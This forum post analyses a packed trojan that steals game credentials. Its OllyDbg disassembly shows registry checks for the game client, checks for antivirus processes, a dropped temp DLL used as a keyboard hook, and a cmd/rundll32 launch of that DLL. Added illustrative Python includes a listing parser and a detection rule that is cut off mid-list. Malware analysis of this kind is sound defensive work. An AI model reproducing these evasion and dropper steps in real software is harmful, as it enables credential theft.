曹无咎
Posted on 2011-2-13 21:45
This post was last edited by 是昔流芳 on 2011-2-14 12:02
Tools used: OD, PEiD
Starting from the sample I received: after extracting it, I first checked it with PEiD (old habit) and found it was packed with UPX, which the ESP trick takes care of. On reaching the OEP I did not rush into single-stepping: there are a lot of referenced functions and strings, and those help a great deal when analyzing a sample. From them it looks like a credential-stealing trojan for some online game. Later in the analysis I found the string "zhuxian"; could it be "Zhu Xian" (诛仙)? There are also many strings related to the registry and to several antivirus products. With that overview, I started single-stepping:
I won't paste the unpacking code; the ESP trick alone does it (you know the drill).
004016D0 81EC 38090000 sub esp,938 ; OEP
004016D6 53 push ebx
004016D7 55 push ebp
004016D8 56 push esi
004016D9 8B35 2C204000 mov esi,dword ptr ds:[40202C] ; kernel32.Sleep ; a Sleep call right at the start
004016DF 57 push edi
004016E0 68 88130000 push 1388 ; sleep for 5000 ms
004016E5 FFD6 call esi
004016E7 6A 00 push 0
004016E9 68 50144000 push virus.00401450
004016EE FF15 C4204000 call dword ptr ds:[4020C4] ; enumerate the windows on the desktop
004016F4 68 DC050000 push 5DC
004016F9 FFD6 call esi
004016FB B9 00010000 mov ecx,100
00401700 33C0 xor eax,eax
00401702 8D7C24 44 lea edi,dword ptr ss:[esp+44]
00401706 F3:AB rep stos dword ptr es:[edi]
00401708 8D4424 44 lea eax,dword ptr ss:[esp+44]
0040170C 50 push eax
0040170D 68 98354000 push virus.00403598
00401712 68 70314000 push virus.00403170 ; ASCII "ZPWUpdatePack\DefaultIcon"
00401717 68 00000080 push 80000000 ; seeing this, I figure it's a credential-stealing trojan for some game
0040171C E8 BFFCFFFF call virus.004013E0 ;
Stepping into this call shows that it opens the registry and looks for the ZPWUpdatePack\DefaultIcon key (I have never installed that game, so the key does not exist on my machine):
004013E0 51 push ecx
004013E1 8B4C24 0C mov ecx,dword ptr ss:[esp+C]
004013E5 8B5424 08 mov edx,dword ptr ss:[esp+8]
004013E9 8D4424 0C lea eax,dword ptr ss:[esp+C]
004013ED C74424 00 00040>mov dword ptr ss:[esp],400
004013F5 50 push eax
004013F6 68 19000200 push 20019
004013FB 6A 00 push 0
004013FD 51 push ecx
004013FE 52 push edx
004013FF FF15 04204000 call dword ptr ds:[402004] ; advapi32.RegOpenKeyExA
00401405 85C0 test eax,eax
00401407 75 3F jnz short virus.00401448
00401409 56 push esi
0040140A 8B7424 14 mov esi,dword ptr ss:[esp+14]
0040140E 68 98354000 push virus.00403598
00401413 56 push esi
00401414 FF15 64204000 call dword ptr ds:[402064] ; kernel32.lstrcmpiA
0040141A 8B4C24 18 mov ecx,dword ptr ss:[esp+18]
0040141E 85C0 test eax,eax
00401420 8D4424 04 lea eax,dword ptr ss:[esp+4]
00401424 50 push eax
00401425 51 push ecx
00401426 6A 00 push 0
00401428 6A 00 push 0
0040142A 75 04 jnz short virus.00401430
0040142C 6A 00 push 0
0040142E EB 01 jmp short virus.00401431
00401430 56 push esi
00401431 8B5424 24 mov edx,dword ptr ss:[esp+24]
00401435 52 push edx
00401436 FF15 00204000 call dword ptr ds:[402000] ; advapi32.RegQueryValueExA
0040143C 8B4424 10 mov eax,dword ptr ss:[esp+10]
00401440 50 push eax
00401441 FF15 08204000 call dword ptr ds:[402008] ; advapi32.RegCloseKey
00401447 5E pop esi
00401448 59 pop ecx
00401449 C3 retn
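Listings like the one above are easier to read once the imports, string references and call arguments are pulled out mechanically. The following parser is added here as an illustration and is not code from the original post or from the sample: it parses OllyDbg-style disassembly lines, collects the imports named in the `;` comments and the `ASCII "..."` string references, and rebuilds each call's argument list from the pushes that precede it. The listing embedded in it is copied from the lines shown in this post; the `virus.` module prefix and the hand-written notes after the import name are taken from this post's formatting and are the only assumptions it makes.

```python
import re
from dataclasses import dataclass

# Constructed input: lines copied from the OllyDbg listing in this post
# (prologue of sub_4013E0, the MUICache RegOpenKeyExA call and the loop jump).
# "virus." is OllyDbg's module name for the sample; the note after the import
# name on one line is hand-written and kept to show the parser tolerates it.
SAMPLE = r"""
004013E0 51 push ecx
004013E1 8B4C24 0C mov ecx,dword ptr ss:[esp+C]
004013E5 8B5424 08 mov edx,dword ptr ss:[esp+8]
004013E9 8D4424 0C lea eax,dword ptr ss:[esp+C]
004013ED C74424 00 00040>mov dword ptr ss:[esp],400
004013F5 50 push eax
004013F6 68 19000200 push 20019
004013FB 6A 00 push 0
004013FD 51 push ecx
004013FE 52 push edx
004013FF FF15 04204000 call dword ptr ds:[402004] ; advapi32.RegOpenKeyExA
00401405 85C0 test eax,eax
00401407 75 3F jnz short virus.00401448
00401791 8D4424 14 lea eax,dword ptr ss:[esp+14]
00401795 C74424 18 00000>mov dword ptr ss:[esp+18],0
0040179D 50 push eax
0040179E 68 19000200 push 20019
004017A3 6A 00 push 0
004017A5 68 28314000 push virus.00403128 ; ASCII "Software\Microsoft\Windows\ShellNoRoam\MUICache"
004017AA 68 01000080 push 80000001
004017AF C74424 24 00010>mov dword ptr ss:[esp+24],100
004017B7 FF15 04204000 call dword ptr ds:[402004] ; advapi32.RegOpenKeyExA ; open the key above
0040199F ^ 0F84 3FFEFFFF je virus.004017E4 ; backward jump, i.e. the loop
"""

# address | opcode bytes (OllyDbg truncates a long byte column with '>') |
# mnemonic and operands | optional ';' comment
LINE_RE = re.compile(
    r"^(?P<addr>[0-9A-F]{8})\s+"
    r"(?P<bytes>.*?)(?:>|\s)"
    r"(?P<insn>[a-z][a-z0-9]*(?:\s.*?)?)"
    r"\s*(?:;\s*(?P<comment>.*))?$"
)
API_RE = re.compile(r"^(\w+)\.([A-Za-z_]\w*)")   # e.g. advapi32.RegOpenKeyExA
STR_RE = re.compile(r'ASCII "(.*?)"')            # OllyDbg's string annotation
REF_RE = re.compile(r"\b\w+\.([0-9A-F]{8})\b")   # e.g. virus.00403128


@dataclass
class Insn:
    addr: str
    mnemonic: str
    operands: str
    comment: str


def parse_listing(text):
    insns = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # blank lines and prose mixed into the paste are skipped
        parts = m.group("insn").split(None, 1)
        insns.append(Insn(m.group("addr"), parts[0],
                          parts[1].strip() if len(parts) > 1 else "",
                          (m.group("comment") or "").strip()))
    return insns


def extract_apis(insns):
    """(call address, module.Function) for each call whose comment names an import."""
    out = []
    for i in insns:
        m = API_RE.match(i.comment)
        if i.mnemonic == "call" and m:
            out.append((i.addr, f"{m.group(1)}.{m.group(2)}"))
    return out


def extract_strings(insns):
    """Map data address -> string for every 'push module.XXXXXXXX ; ASCII "..."' line."""
    out = {}
    for i in insns:
        m, ref = STR_RE.search(i.comment), REF_RE.search(i.operands)
        if m and ref:
            out[ref.group(1)] = m.group(1)
    return out


def recover_calls(insns):
    """Rebuild each call's argument list from the pushes that precede it.

    This is 32-bit stdcall/cdecl code: arguments are pushed right to left, so
    reversing the pushes seen since the previous call gives prototype order.
    Register saves in a prologue (push ebx/esi/edi, the push ecx at 004013E0)
    are not arguments and appear as extra trailing entries, so only trust as
    many entries as the API's prototype has parameters. Immediates that point
    at a known string are replaced by the string itself.
    """
    strings = extract_strings(insns)
    pending, calls = [], []
    for i in insns:
        if i.mnemonic == "push":
            ref = REF_RE.fullmatch(i.operands)
            if ref and ref.group(1) in strings:
                pending.append('"%s"' % strings[ref.group(1)])
            else:
                pending.append(i.operands)
        elif i.mnemonic == "call":
            m = API_RE.match(i.comment)
            target = f"{m.group(1)}.{m.group(2)}" if m else i.operands
            calls.append((i.addr, target, list(reversed(pending))))
            pending = []
    return calls


if __name__ == "__main__":
    insns = parse_listing(SAMPLE)
    print("imports:", extract_apis(insns))
    print("strings:", extract_strings(insns))
    for addr, target, args in recover_calls(insns):
        print(f"{addr} {target}({', '.join(args)})")
```

Running it prints the second RegOpenKeyExA call as `RegOpenKeyExA(80000001, "Software\Microsoft\Windows\ShellNoRoam\MUICache", 0, 20019, eax)`, i.e. HKEY_CURRENT_USER, the MUICache path, reserved 0, KEY_READ (0x20019) and the output handle pointer, which is exactly what has to be read off the pushes by hand otherwise.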
Continuing down:
00401721 8B1D 58204000 mov ebx,dword ptr ds:[402058] ; kernel32.lstrlenA
00401727 83C4 10 add esp,10
0040172A 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
0040172E 51 push ecx
0040172F FFD3 call ebx
00401731 8B35 B0204000 mov esi,dword ptr ds:[4020B0] ; msvcrt.strstr
00401737 8B2D 70204000 mov ebp,dword ptr ds:[402070] ; kernel32.lstrcatA
0040173D 85C0 test eax,eax
0040173F 7E 50 jle short virus.00401791 ; the jump is taken here.
00401741 8D5424 44 lea edx,dword ptr ss:[esp+44]
00401745 68 64314000 push virus.00403164 ; ASCII "patcher.exe"
0040174A 52 push edx
0040174B FFD6 call esi ; find the first occurrence of the given substring in the string, i.e. patcher.exe
0040174D 83C4 08 add esp,8
00401750 8BF8 mov edi,eax
00401752 57 push edi
00401753 FFD3 call ebx
00401755 8BC8 mov ecx,eax
00401757 33C0 xor eax,eax
00401759 8BD1 mov edx,ecx
0040175B 68 58314000 push virus.00403158 ; ASCII "..\element\"
00401760 C1E9 02 shr ecx,2
00401763 F3:AB rep stos dword ptr es:[edi]
00401765 8BCA mov ecx,edx
00401767 83E1 03 and ecx,3
0040176A F3:AA rep stos byte ptr es:[edi]
0040176C 8D4424 48 lea eax,dword ptr ss:[esp+48]
00401770 50 push eax
00401771 FFD5 call ebp
00401773 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
00401777 51 push ecx
00401778 E8 B3FDFFFF call virus.00401530
0040177D 83C4 04 add esp,4
00401780 85C0 test eax,eax
00401782 74 0D je short virus.00401791
00401784 8D5424 44 lea edx,dword ptr ss:[esp+44]
00401788 52 push edx
00401789 E8 32FAFFFF call virus.004011C0
0040178E 83C4 04 add esp,4
00401791 8D4424 14 lea eax,dword ptr ss:[esp+14]
00401795 C74424 18 00000>mov dword ptr ss:[esp+18],0
0040179D 50 push eax
0040179E 68 19000200 push 20019
004017A3 6A 00 push 0
004017A5 68 28314000 push virus.00403128 ; ASCII "Software\Microsoft\Windows\ShellNoRoam\MUICache"
According to a Baidu search, the registry path "Software\Microsoft\Windows\ShellNoRoam\MUICache" is a cache holding the absolute paths of executables that have been run. So, since the key above was not found, the sample switches to another way of checking whether the game is present.
004017AA 68 01000080 push 80000001
004017AF C74424 24 00010>mov dword ptr ss:[esp+24],100
004017B7 FF15 04204000 call dword ptr ds:[402004] ; advapi32.RegOpenKeyExA ; open the key above
004017BD 6A 00 push 0
004017BF 6A 00 push 0
004017C1 8B4424 1C mov eax,dword ptr ss:[esp+1C]
004017C5 6A 00 push 0
004017C7 8D4C24 1C lea ecx,dword ptr ss:[esp+1C]
004017CB 6A 00 push 0
004017CD 8D5424 54 lea edx,dword ptr ss:[esp+54]
004017D1 51 push ecx
004017D2 52 push edx
004017D3 6A 00 push 0
004017D5 50 push eax
004017D6 FF15 10204000 call dword ptr ds:[402010] ; advapi32.RegEnumValueA ; enumeration begins... presumably checking whether "ElementClient.exe" is there...
004017DC 85C0 test eax,eax
004017DE 0F85 C1010000 jnz virus.004019A5
004017E4 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
004017E8 68 14314000 push virus.00403114 ; ASCII "ElementClient.exe"
004017ED 51 push ecx
004017EE FFD6 call esi ; this call was covered above: "find the first occurrence of the given substring"
004017F0 83C4 08 add esp,8
004017F3 85C0 test eax,eax
004017F5 74 44 je short virus.0040183B ; not found, jumps away...
004017F7 8D5424 44 lea edx,dword ptr ss:[esp+44]
004017FB 68 14314000 push virus.00403114 ; ASCII "ElementClient.exe"
00401800 52 push edx
00401801 FFD6 call esi
00401803 83C4 08 add esp,8
00401806 8BF8 mov edi,eax
00401808 57 push edi
00401809 FFD3 call ebx
0040180B 8BC8 mov ecx,eax
0040180D 33C0 xor eax,eax
0040180F 8BD1 mov edx,ecx
00401811 C1E9 02 shr ecx,2
00401814 F3:AB rep stos dword ptr es:[edi]
00401816 8BCA mov ecx,edx
00401818 83E1 03 and ecx,3
0040181B F3:AA rep stos byte ptr es:[edi]
0040181D 8D4424 44 lea eax,dword ptr ss:[esp+44]
00401821 50 push eax
00401822 E8 09FDFFFF call virus.00401530
00401827 83C4 04 add esp,4
0040182A 85C0 test eax,eax
0040182C 74 0D je short virus.0040183B
0040182E 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
00401832 51 push ecx
00401833 E8 88F9FFFF call virus.004011C0
00401838 83C4 04 add esp,4
0040183B 8D5424 44 lea edx,dword ptr ss:[esp+44]
0040183F 68 00314000 push virus.00403100 ; ASCII "elementclient.exe" ; now the lower-case spelling, haha, quite thorough...
00401844 52 push edx
00401845 FFD6 call esi
00401847 83C4 08 add esp,8
0040184A 85C0 test eax,eax
0040184C 74 44 je short virus.00401892 ; jumps away again...
0040184E 8D4424 44 lea eax,dword ptr ss:[esp+44]
00401852 68 00314000 push virus.00403100 ; ASCII "elementclient.exe"
00401857 50 push eax
00401858 FFD6 call esi
0040185A 83C4 08 add esp,8
0040185D 8BF8 mov edi,eax
0040185F 57 push edi
00401860 FFD3 call ebx
00401862 8BC8 mov ecx,eax
00401864 33C0 xor eax,eax
00401866 8BD1 mov edx,ecx
00401868 C1E9 02 shr ecx,2
0040186B F3:AB rep stos dword ptr es:[edi]
0040186D 8BCA mov ecx,edx
0040186F 83E1 03 and ecx,3
00401872 F3:AA rep stos byte ptr es:[edi]
00401874 8D4424 44 lea eax,dword ptr ss:[esp+44]
00401878 50 push eax
00401879 E8 B2FCFFFF call virus.00401530
0040187E 83C4 04 add esp,4
00401881 85C0 test eax,eax
00401883 74 0D je short virus.00401892
00401885 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
00401889 51 push ecx
0040188A E8 31F9FFFF call virus.004011C0
0040188F 83C4 04 add esp,4
00401892 8D5424 44 lea edx,dword ptr ss:[esp+44]
00401896 68 64314000 push virus.00403164 ; ASCII "patcher.exe"
0040189B 52 push edx
0040189C FFD6 call esi ; same as above
0040189E 83C4 08 add esp,8
004018A1 85C0 test eax,eax
004018A3 74 50 je short virus.004018F5 ; jumps away yet again!
004018A5 8D4424 44 lea eax,dword ptr ss:[esp+44]
004018A9 68 64314000 push virus.00403164 ; ASCII "patcher.exe"
004018AE 50 push eax
004018AF FFD6 call esi
004018B1 83C4 08 add esp,8
004018B4 8BF8 mov edi,eax
004018B6 57 push edi
004018B7 FFD3 call ebx
004018B9 8BC8 mov ecx,eax
004018BB 33C0 xor eax,eax
004018BD 8BD1 mov edx,ecx
004018BF 68 58314000 push virus.00403158 ; ASCII "..\element\"
004018C4 C1E9 02 shr ecx,2
004018C7 F3:AB rep stos dword ptr es:[edi]
004018C9 8BCA mov ecx,edx
004018CB 83E1 03 and ecx,3
004018CE F3:AA rep stos byte ptr es:[edi]
004018D0 8D4424 48 lea eax,dword ptr ss:[esp+48]
004018D4 50 push eax
004018D5 FFD5 call ebp
004018D7 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
004018DB 51 push ecx
004018DC E8 4FFCFFFF call virus.00401530
004018E1 83C4 04 add esp,4
004018E4 85C0 test eax,eax
004018E6 74 0D je short virus.004018F5
004018E8 8D5424 44 lea edx,dword ptr ss:[esp+44]
004018EC 52 push edx
004018ED E8 CEF8FFFF call virus.004011C0
004018F2 83C4 04 add esp,4
004018F5 8D4424 44 lea eax,dword ptr ss:[esp+44]
004018F9 68 F0304000 push virus.004030F0 ; ASCII "Launcher.exe" ; the capitalized spelling...
004018FE 50 push eax
004018FF FFD6 call esi
00401901 83C4 08 add esp,8
00401904 85C0 test eax,eax
00401906 74 50 je short virus.00401958 ; still jumps away...
00401908 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
0040190C 68 F0304000 push virus.004030F0 ; ASCII "Launcher.exe"
00401911 51 push ecx
00401912 FFD6 call esi
00401914 83C4 08 add esp,8
00401917 8BF8 mov edi,eax
00401919 57 push edi
0040191A FFD3 call ebx
0040191C 8BC8 mov ecx,eax
0040191E 33C0 xor eax,eax
00401920 8BD1 mov edx,ecx
00401922 68 58314000 push virus.00403158 ; ASCII "..\element\"
00401927 C1E9 02 shr ecx,2
0040192A F3:AB rep stos dword ptr es:[edi]
0040192C 8BCA mov ecx,edx
0040192E 83E1 03 and ecx,3
00401931 F3:AA rep stos byte ptr es:[edi]
00401933 8D4424 48 lea eax,dword ptr ss:[esp+48]
00401937 50 push eax
00401938 FFD5 call ebp
0040193A 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
0040193E 51 push ecx
0040193F E8 ECFBFFFF call virus.00401530
00401944 83C4 04 add esp,4
00401947 85C0 test eax,eax
00401949 74 0D je short virus.00401958
0040194B 8D5424 44 lea edx,dword ptr ss:[esp+44]
0040194F 52 push edx
00401950 E8 6BF8FFFF call virus.004011C0
00401955 83C4 04 add esp,4
00401958 8B4424 10 mov eax,dword ptr ss:[esp+10]
0040195C 8B7C24 18 mov edi,dword ptr ss:[esp+18]
00401960 8B5424 14 mov edx,dword ptr ss:[esp+14]
00401964 8D4C24 44 lea ecx,dword ptr ss:[esp+44]
00401968 50 push eax
00401969 51 push ecx
0040196A 57 push edi
0040196B 52 push edx
0040196C FF15 0C204000 call dword ptr ds:[40200C] ; advapi32.RegEnumKeyA ; enumerating with RegEnumKeyEx.
00401972 6A 00 push 0
00401974 6A 00 push 0
00401976 8B5424 1C mov edx,dword ptr ss:[esp+1C]
0040197A 6A 00 push 0
0040197C 8D4424 1C lea eax,dword ptr ss:[esp+1C]
00401980 6A 00 push 0
00401982 8D4C24 54 lea ecx,dword ptr ss:[esp+54]
00401986 47 inc edi
00401987 50 push eax
00401988 51 push ecx
00401989 57 push edi
0040198A 52 push edx
0040198B 897C24 38 mov dword ptr ss:[esp+38],edi
0040198F C74424 30 00010>mov dword ptr ss:[esp+30],100
00401997 FF15 10204000 call dword ptr ds:[402010] ; advapi32.RegEnumValueA
0040199D 85C0 test eax,eax
0040199F ^ 0F84 3FFEFFFF je virus.004017E4 ; backward jump here, i.e. a loop...
004019A5 68 E4304000 push virus.004030E4 ; ASCII "czxasdfgh" ; when the enumeration finds nothing, create the mutex "czxasdfgh"
004019AA 6A 00 push 0
004019AC 68 01001F00 push 1F0001
004019B1 FF15 54204000 call dword ptr ds:[402054] ; kernel32.OpenMutexA ; mutex function...
004019B7 85C0 test eax,eax
004019B9 0F85 B9010000 jnz virus.00401B78
004019BF 68 DC304000 push virus.004030DC ; ASCII "avp.exe" ; Kaspersky main process
004019C4 E8 67F8FFFF call virus.00401230 ; this call walks the process list looking for the Kaspersky process; I'm not going into the code inside it, heh...
004019C9 83C4 04 add esp,4
004019CC 85C0 test eax,eax
004019CE 0F85 A4010000 jnz virus.00401B78
004019D4 68 D0304000 push virus.004030D0 ; ASCII "RavMonD.exe" ; Rising main process; neither is found, since I run with no AV at all...
004019D9 E8 52F8FFFF call virus.00401230 ; same as above
004019DE 83C4 04 add esp,4
004019E1 85C0 test eax,eax
004019E3 0F85 8F010000 jnz virus.00401B78
004019E9 8B8424 4C090000 mov eax,dword ptr ss:[esp+94C]
004019F0 8B0D C4304000 mov ecx,dword ptr ds:[4030C4]
004019F6 8B15 C8304000 mov edx,dword ptr ds:[4030C8]
004019FC A3 8C354000 mov dword ptr ds:[40358C],eax
00401A01 A0 CC304000 mov al,byte ptr ds:[4030CC]
00401A06 894C24 1C mov dword ptr ss:[esp+1C],ecx
00401A0A 884424 24 mov byte ptr ss:[esp+24],al
00401A0E B9 00010000 mov ecx,100
00401A13 33C0 xor eax,eax
00401A15 8DBC24 48050000 lea edi,dword ptr ss:[esp+548]
00401A1C F3:AB rep stos dword ptr es:[edi] ; the sample process exits here!!!!!!!! had to start over
00401A1E 68 B8304000 push virus.004030B8 ; ASCII "hdllpath" ; the dll path? looks like it...
00401A23 895424 24 mov dword ptr ss:[esp+24],edx
00401A27 E8 D4F5FFFF call virus.00401000
00401A2C 8D8C24 4C050000 lea ecx,dword ptr ss:[esp+54C]
00401A33 51 push ecx
00401A34 E8 C7F5FFFF call virus.00401000
00401A39 83C4 08 add esp,8
00401A3C 8D9424 48050000 lea edx,dword ptr ss:[esp+548]
00401A43 52 push edx
00401A44 68 04010000 push 104
00401A49 FF15 24204000 call dword ptr ds:[402024] ; kernel32.GetTempPathA ; get the path of the temp folder
00401A4F FF15 28204000 call dword ptr ds:[402028] ; kernel32.GetTickCount ; milliseconds elapsed since the OS started
00401A55 8BD0 mov edx,eax
00401A57 B9 40000000 mov ecx,40
00401A5C 33C0 xor eax,eax
00401A5E 8DBC24 45040000 lea edi,dword ptr ss:[esp+445]
00401A65 C68424 44040000>mov byte ptr ss:[esp+444],0
00401A6D F3:AB rep stos dword ptr es:[edi]
00401A6F 66:AB stos word ptr es:[edi]
00401A71 AA stos byte ptr es:[edi]
00401A72 8D8424 44040000 lea eax,dword ptr ss:[esp+444]
00401A79 50 push eax
00401A7A 52 push edx
00401A7B E8 40FAFFFF call virus.004014C0 ; generates a random dll name; I expect this is related to the keyboard hook...
Since I don't have this game installed, the sample ends here for me; it seems to have generated a randomly named dll file in the temp folder! It presumably uses that dll to hook keyboard messages and capture the account and password...
00401A80 83C4 08 add esp,8
00401A83 8D8C24 44040000 lea ecx,dword ptr ss:[esp+444]
00401A8A 8D9424 48050000 lea edx,dword ptr ss:[esp+548]
00401A91 51 push ecx
00401A92 52 push edx
00401A93 FFD5 call ebp
00401A95 8D8424 48050000 lea eax,dword ptr ss:[esp+548]
00401A9C 68 B0304000 push virus.004030B0 ; ASCII "z28.dll"
00401AA1 50 push eax
00401AA2 FFD5 call ebp
00401AA4 8D8C24 48050000 lea ecx,dword ptr ss:[esp+548]
00401AAB 51 push ecx
00401AAC 6A 6D push 6D
00401AAE E8 5DF5FFFF call virus.00401010 ; look up the resource...
00401AB3 83C4 08 add esp,8
00401AB6 85C0 test eax,eax
00401AB8 0F84 BA000000 je virus.00401B78
00401ABE 8D9424 48050000 lea edx,dword ptr ss:[esp+548]
00401AC5 52 push edx
00401AC6 E8 25F6FFFF call virus.004010F0 ; writes the kuser.dll virus file...
00401ACB 83C4 04 add esp,4
00401ACE 8D4424 1C lea eax,dword ptr ss:[esp+1C]
00401AD2 50 push eax
00401AD3 6A 04 push 4
00401AD5 6A 00 push 0
00401AD7 6A 04 push 4
00401AD9 6A 00 push 0
00401ADB 6A FF push -1
00401ADD FF15 50204000 call dword ptr ds:[402050] ; kernel32.CreateFileMappingA
00401AE3 6A 04 push 4
00401AE5 6A 00 push 0
00401AE7 8BD8 mov ebx,eax
00401AE9 6A 00 push 0
00401AEB 68 1F000F00 push 0F001F
00401AF0 53 push ebx
00401AF1 FF15 4C204000 call dword ptr ds:[40204C] ; kernel32.MapViewOfFile
00401AF7 8BE8 mov ebp,eax
00401AF9 FF15 48204000 call dword ptr ds:[402048] ; kernel32.GetCurrentThreadId
00401AFF 8D8C24 48050000 lea ecx,dword ptr ss:[esp+548]
00401B06 8945 00 mov dword ptr ss:[ebp],eax
00401B09 51 push ecx
00401B0A FF15 44204000 call dword ptr ds:[402044] ; kernel32.LoadLibraryA
00401B10 8BF0 mov esi,eax
00401B12 85F6 test esi,esi
00401B14 74 67 je short virus.00401B7D
00401B16 8B3D 40204000 mov edi,dword ptr ds:[402040] ; kernel32.GetProcAddress
00401B1C 68 A8304000 push virus.004030A8 ; ASCII "zhko"
00401B21 56 push esi
00401B22 FFD7 call edi
00401B24 68 A0304000 push virus.004030A0 ; ASCII "zhkf"
00401B29 56 push esi
00401B2A A3 90354000 mov dword ptr ds:[403590],eax
00401B2F FFD7 call edi
00401B31 A3 94354000 mov dword ptr ds:[403594],eax
00401B36 FF15 90354000 call dword ptr ds:[403590]
00401B3C 8B35 BC204000 mov esi,dword ptr ds:[4020BC] ; user32.GetMessageA
00401B42 6A 00 push 0
00401B44 6A 00 push 0
00401B46 8D5424 30 lea edx,dword ptr ss:[esp+30]
00401B4A 6A 00 push 0
00401B4C 52 push edx
00401B4D FFD6 call esi
00401B4F 85C0 test eax,eax
00401B51 74 11 je short virus.00401B64
00401B53 6A 00 push 0
00401B55 6A 00 push 0
00401B57 8D4424 30 lea eax,dword ptr ss:[esp+30]
00401B5B 6A 00 push 0
00401B5D 50 push eax
00401B5E FFD6 call esi
00401B60 85C0 test eax,eax
00401B62 ^ 75 EF jnz short virus.00401B53
00401B64 55 push ebp
00401B65 FF15 3C204000 call dword ptr ds:[40203C] ; kernel32.UnmapViewOfFile
00401B6B FF15 94354000 call dword ptr ds:[403594]
00401B71 53 push ebx
00401B72 FF15 A4204000 call dword ptr ds:[4020A4] ; kernel32.CloseHandle
00401B78 E8 43F7FFFF call virus.004012C0
00401B7D 5F pop edi
00401B7E 5E pop esi
00401B7F 5D pop ebp
00401B80 33C0 xor eax,eax
00401B82 5B pop ebx
00401B83 81C4 38090000 add esp,938
00401B89 C2 1000 retn 10
After it finished, I found that OD could no longer be used; sigh. After reloading, I also found:
004012C0 81EC 10040000 sub esp,410
004012C6 53 push ebx
004012C7 56 push esi
004012C8 57 push edi
004012C9 33DB xor ebx,ebx
004012CB B9 40000000 mov ecx,40
004012D0 33C0 xor eax,eax
004012D2 8DBC24 15020000 lea edi,dword ptr ss:[esp+215]
004012D9 889C24 14020000 mov byte ptr ss:[esp+214],bl
004012E0 F3:AB rep stos dword ptr es:[edi]
004012E2 66:AB stos word ptr es:[edi]
004012E4 AA stos byte ptr es:[edi]
004012E5 8D8424 14020000 lea eax,dword ptr ss:[esp+214]
004012EC 68 04010000 push 104
004012F1 50 push eax
004012F2 53 push ebx
004012F3 FF15 78204000 call dword ptr ds:[402078] ; kernel32.GetModuleFileNameA
004012F9 B9 40000000 mov ecx,40
004012FE 33C0 xor eax,eax
00401300 8D7C24 0D lea edi,dword ptr ss:[esp+D]
00401304 885C24 0C mov byte ptr ss:[esp+C],bl
00401308 F3:AB rep stos dword ptr es:[edi]
0040130A 66:AB stos word ptr es:[edi]
0040130C 8D4C24 0C lea ecx,dword ptr ss:[esp+C]
00401310 51 push ecx
00401311 68 04010000 push 104
00401316 AA stos byte ptr es:[edi]
00401317 FF15 24204000 call dword ptr ds:[402024] ; kernel32.GetTempPathA
0040131D 8B35 70204000 mov esi,dword ptr ds:[402070] ; kernel32.lstrcatA
00401323 8D5424 0C lea edx,dword ptr ss:[esp+C]
00401327 68 84304000 push virus.00403084 ; ASCII "z28z.dll"
0040132C 52 push edx
0040132D FFD6 call esi
0040132F 8D4424 0C lea eax,dword ptr ss:[esp+C]
00401333 50 push eax
00401334 6A 6D push 6D
00401336 E8 D5FCFFFF call virus.00401010
0040133B B9 40000000 mov ecx,40
00401340 33C0 xor eax,eax
00401342 8DBC24 19010000 lea edi,dword ptr ss:[esp+119]
00401349 889C24 18010000 mov byte ptr ss:[esp+118],bl
00401350 F3:AB rep stos dword ptr es:[edi]
00401352 83C4 08 add esp,8
00401355 8D8C24 10010000 lea ecx,dword ptr ss:[esp+110]
0040135C 66:AB stos word ptr es:[edi]
0040135E 68 04010000 push 104
00401363 51 push ecx
00401364 AA stos byte ptr es:[edi]
00401365 FF15 20204000 call dword ptr ds:[402020] ; kernel32.GetSystemDirectoryA
0040136B 8D9424 10010000 lea edx,dword ptr ss:[esp+110]
00401372 68 74304000 push virus.00403074 ; ASCII "\rundll32.exe"
00401377 52 push edx
00401378 FFD6 call esi
0040137A B9 40000000 mov ecx,40
0040137F 33C0 xor eax,eax
00401381 8DBC24 19030000 lea edi,dword ptr ss:[esp+319]
00401388 889C24 18030000 mov byte ptr ss:[esp+318],bl
0040138F F3:AB rep stos dword ptr es:[edi]
00401391 66:AB stos word ptr es:[edi]
00401393 AA stos byte ptr es:[edi]
00401394 8D8424 14020000 lea eax,dword ptr ss:[esp+214]
0040139B 8D4C24 0C lea ecx,dword ptr ss:[esp+C]
0040139F 50 push eax
004013A0 68 64304000 push virus.00403064 ; ASCII "InstallService"
004013A5 8D9424 18010000 lea edx,dword ptr ss:[esp+118]
004013AC 51 push ecx
004013AD 52 push edx
004013AE 8D8424 28030000 lea eax,dword ptr ss:[esp+328]
004013B5 68 50304000 push virus.00403050 ; ASCII "cmd /c %s %s,%s %s"
004013BA 50 push eax
004013BB FF15 C8204000 call dword ptr ds:[4020C8] ; user32.wsprintfA
004013C1 83C4 18 add esp,18
004013C4 8D8C24 18030000 lea ecx,dword ptr ss:[esp+318]
004013CB 53 push ebx
004013CC 51 push ecx
004013CD FF15 1C204000 call dword ptr ds:[40201C] ; kernel32.WinExec
004013D3 53 push ebx
004013D4 FF15 18204000 call dword ptr ds:[402018] ; kernel32.ExitProcess
004013DA 5F pop edi
004013DB 5E pop esi
004013DC 5B pop ebx
004013DD 90 nop
004013DE 90 nop
004013DF 90 nop
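The wsprintfA format string `cmd /c %s %s,%s %s` above, filled with the pushes that precede it, yields a command line of the form `cmd /c <system32>\rundll32.exe <temp>\z28z.dll,InstallService <sample path>`, which is then handed to WinExec. From the defender's side that is a recognizable process-creation pattern: rundll32 started through a cmd.exe wrapper with a DLL that lives in a user-writable directory. The rule below is added here as an illustration and is not part of the original post; the log lines it runs over are constructed, in a simplified key=value layout loosely modelled on process-creation telemetry, not real captures, and the short-name temp paths are my assumption of what an XP-era %TEMP% would look like.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample events (not real telemetry). The key=value layout and
# field names are a simplification of process-creation logging.
SAMPLE_LOG = [
    r'ParentImage=C:\WINDOWS\explorer.exe Image=C:\WINDOWS\system32\rundll32.exe '
    r'CommandLine="rundll32.exe shell32.dll,Control_RunDLL desk.cpl"',
    r'ParentImage=C:\WINDOWS\system32\cmd.exe Image=C:\WINDOWS\system32\rundll32.exe '
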